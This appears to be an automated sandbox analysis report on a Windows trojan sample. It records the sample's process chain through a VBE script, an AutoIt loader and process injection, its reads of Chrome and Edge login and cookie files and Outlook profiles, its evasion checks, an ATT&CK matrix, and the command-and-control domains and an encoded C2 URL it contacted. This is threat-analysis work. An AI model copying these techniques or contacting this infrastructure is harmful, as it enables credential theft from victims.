            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4#5-575memstr_a2a0ce54-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6-646b6i6p6w6~6memstr_10a8af7d-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7'7-787?7h7e7|7memstr_158c9ccf-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8c9o9memstr_8d4ef8bd-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :":-:4:?:f:q:x:c:j:u:|:memstr_429578b7-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;$;/;x;memstr_5a4c654a-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <#<9<l<r<i<~<memstr_7e095443-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =&=6=memstr_ff753261-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3%3)3-3!5(5]5-61656a8k8x8&:g:memstr_a70237f3-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;a;n;memstr_faad9444-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <#<:<t<z<c<p<z<memstr_85ee55c2-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 161c1=2a2e2i2m2q2u2y2]2a2e2i2m2q2u2memstr_89f42078-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 434h4u4^4p4{4memstr_84a14670-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5a5t5memstr_c9bc8607-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 45a5t5memstr_0b40ad28-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 56h6memstr_e1f34247-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 707m7memstr_b158d36c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9l:";/;w;memstr_0f621d0d-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 040p0l0r0memstr_4087002a-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 033a3memstr_c74aa62d-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5%5f5m5|5memstr_7bf2ce41-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7(7g7n7o7v7memstr_786abf3b-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8 838\8h8w8~8memstr_7a753c21-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8:9f9{9memstr_fe3faffa-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :3:::i:memstr_118dafb3-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;:;k;];c;|;memstr_1c9bca59-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;%<u<memstr_11d09016-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =%=.=f=memstr_e266db37-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?3?c?memstr_46198f0b-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @0l0s0l0memstr_11a6ec29-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1&1.171>1memstr_6fd24f33-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1s2[2l2t2memstr_c5897edb-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3+4v4memstr_038998ba-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4%5z5|5memstr_6febe49d-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 616e6memstr_ffcd16f9-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7;7h7}7memstr_ac52134b-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8)8@8^8memstr_9448a724-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9=9r9]9r9memstr_b80dda38-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;\;|;memstr_38ece99d-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)=h=memstr_458e44c8-2
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DCBB02 SendInput,keybd_event,8_2_00DCBB02
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DCEBE5 mouse_event,8_2_00DCEBE5
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm bpqdpksed.icm vbepwhj.mp3
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DC13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_00DC13F2
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DC1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00DC1EF3
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000705F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.000000000195B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
            Source: bpqdpksed.icm, 00000008.00000003.2402044171.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401355186.00000000018C3000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402065265.00000000018D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: bpqdpksed.icm, rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
            Source: vbepwhj.mp3.8.dr, vbepwhj.mp3.0.dr | Binary or memory string: If WinGetText("Program Manager") = "0" Then
            Source: rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: bpqdpksed.icm, 00000008.00000003.2402123041.000000000186E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402448833.0000000001874000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402241481.0000000001873000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then]

            Language, Device and Operating System Detection

            Source: Yara match | File source: Process Memory Space: bpqdpksed.icm PID: 5156, type: MEMORYSTR
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E86694 cpuid 0_2_00E86694
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00E7FD34
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E8454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00E8454A
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DBE5F8 GetUserNameW,8_2_00DBE5F8
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00D9BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00D9BCF2
            Source: C:\Users\user\Desktop\FS04dlvJrq.exe | Code function: 0_2_00E703BE GetVersionExW,0_2_00E703BE
            Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
            Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: bpqdpksed.icm | Binary or memory string: WIN_81
            Source: bpqdpksed.icm | Binary or memory string: WIN_XP
            Source: bpqdpksed.icm.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: bpqdpksed.icm | Binary or memory string: WIN_XPe
            Source: bpqdpksed.icm | Binary or memory string: WIN_VISTA
            Source: bpqdpksed.icm | Binary or memory string: WIN_7
            Source: bpqdpksed.icm | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DE2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_00DE2163
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DE1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 8_2_00DE1B61
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information1
            Scripting
            2
            Valid Accounts
            1
            Native API
            1
            Scripting
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt2
            Valid Accounts
            1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Registry Run Keys / Startup Folder
            2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS128
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            Software Packing
            LSA Secrets361
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts612
            Process Injection
            1
            DLL Side-Loading
            Cached Domain Credentials12
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Registry Run Keys / Startup Folder
            11
            Masquerading
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Valid Accounts
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Virtualization/Sandbox Evasion
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
            Access Token Manipulation
            Network Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
            Process Injection
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1550252 | Sample: FS04dlvJrq.exe | Start date: 06/11/2024 | Architecture: WINDOWS | Score: 100
            Sample-level DNS/IP info: x105.jieruitech.info; www.uphc255.vip; 7 other IPs or domains
            Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures
            • FS04dlvJrq.exe 3 33 (started)
              • dropped: C:\Users\user\AppData\Local\...\bpqdpksed.icm, PE32
              • dropped: C:\Users\user\AppData\Local\Temp\...\tsmr.vbe, Unicode
              • signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              • wscript.exe 1 (started)
                • signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                • cmd.exe 1 (started)
                  • bpqdpksed.icm 1 30 (started)
                    • dropped: C:\Users\user\AppData\...\bpqdpksed.icm.exe, PE32
                    • dropped: C:\Users\user\AppData\...\bpqdpksed.icm.exe, PE32
                    • dropped: C:\Users\user\AppData\...\bpqdpksed.icm, PE32
                    • signature: Found API chain indicative of sandbox detection
                    • signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    • signature: Writes to foreign memory regions
                    • 2 other signatures
                    • RegSvcs.exe (started)
                      • signature: Maps a DLL or memory area into another process
                      • rmfPfCOHcNt.exe (injected)
                        • signature: Found direct / indirect Syscall (likely to bypass EDR)
                        • EhStorAuthn.exe 13 (started)
                          • signature: Tries to steal Mail credentials (via file / registry access)
                          • signature: Tries to harvest and steal browser information (history, passwords, etc)
                          • signature: Modifies the context of a thread in another process (thread injection)
                          • 3 other signatures
                          • rmfPfCOHcNt.exe (injected)
                            • DNS/IP: www.integritywork.shop 216.40.34.41, 49982, 80 TUCOWSCA Canada
                            • DNS/IP: www.sadey.info 162.0.225.218, 49994, 49995, 49996 NAMECHEAP-NETUS Canada
                            • 2 other IPs or domains
                            • signature: Found direct / indirect Syscall (likely to bypass EDR)
                          • firefox.exe (started)
                    • RegSvcs.exe (started)
                      • WerFault.exe 2 (started)
                  • conhost.exe (started)
                • cmd.exe 1 (started)
                  • signature: Uses ipconfig to lookup or modify the Windows network settings
                  • conhost.exe (started)
                  • ipconfig.exe 1 (started)
                • cmd.exe 1 (started)
                  • conhost.exe (started)
                  • ipconfig.exe 1 (started)

            Source | Detection | Scanner | Label | Link
            FS04dlvJrq.exe | 47% | ReversingLabs | Win32.Trojan.Leonem
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | 0% | ReversingLabs
            C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm.exe | 0% | ReversingLabs
            C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm | 0% | ReversingLabs
            C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm.exe | 0% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://www.hover.com/privacy?source=parked | 0% | Avira URL Cloud | safe
            https://www.hover.com/renew?source=parked | 0% | Avira URL Cloud | safe
            https://www.hover.com/email?source=parked | 0% | Avira URL Cloud | safe
            http://www.c6ytv.net/3tnk/?8RN4oRq=CW2JkxV3pcekLoIorT56ryscgS11ntIpF5Aeg7ZfnKRiExYc+D8BbmUzHwDhufn4r4Dro/61FctGFi0noZVWC4EErF1Fy7sjRinEodY+GdyVC1Z8TkDJNhe4fZdCuwZwItNyPB0=&SBV8T=1lJpZfbXA4K | 0% | Avira URL Cloud | safe
            https://www.hover.com/about?source=parked | 0% | Avira URL Cloud | safe
